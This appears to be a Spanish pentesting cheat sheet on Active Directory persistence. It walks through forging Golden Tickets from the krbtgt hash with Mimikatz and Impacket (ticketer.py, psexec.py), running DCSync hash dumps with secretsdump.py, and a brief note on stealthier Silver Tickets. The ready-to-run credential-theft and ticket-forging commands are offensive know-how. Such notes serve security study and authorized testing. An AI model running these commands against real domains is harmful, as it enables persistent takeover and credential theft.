Domain Persistence (Golden Ticket)¶
[!danger] Total Domination Si comprometes el DC y extraes el hash
krbtgt, eres Dios. Puedes forjar tickets válidos "para siempre" (10 años), incluso si el usuario Admin cambia su password.
1. Prerequisites¶
Necesitas:
1. KRBTGT Hash (NTLM). Extráelo con Mimikatz (lsadump::lsa /patch) o ntds.dit.
2. Domain SID. (whoami /user)
2. Golden Ticket (Impacket)¶
Crear un ticket TGT falso para el usuario "Administrator" (o uno inventado).
# S-1-5-... es el SID del dominio (quita el -500 del final)
ticketer.py -nthash <KRBTGT_HASH> -domain-sid <SID> -domain <DOMAIN> administrator
# Exportar ticket para uso
export KRB5CCNAME=administrator.ccache
# Usar ticket
psexec.py <DOMAIN>/administrator@<DC_HOSTNAME> -k -no-pass
3. DCSync (Mimikatz)¶
Si tienes un usuario con permisos de replicación (ej: Domain Admins), puedes pedirle al DC que te escupa los hashes de otros usuarios. No necesitas loguearte en el DC.
# Desde Kali con secretos de secretsdump
secretsdump.py <DOMAIN>/<USER>:<PASS>@<IP> -just-dc-user Administrator
4. Silver Ticket¶
Falsificar un TGS para un servicio específico (ej: CIFS/SMB en el FileServer). Menos poderoso que Golden, pero mucho más sigiloso (no genera logs en el DC). Necesitas el hash NTLM de la Cuenta de Servicio (computadora), no krbtgt.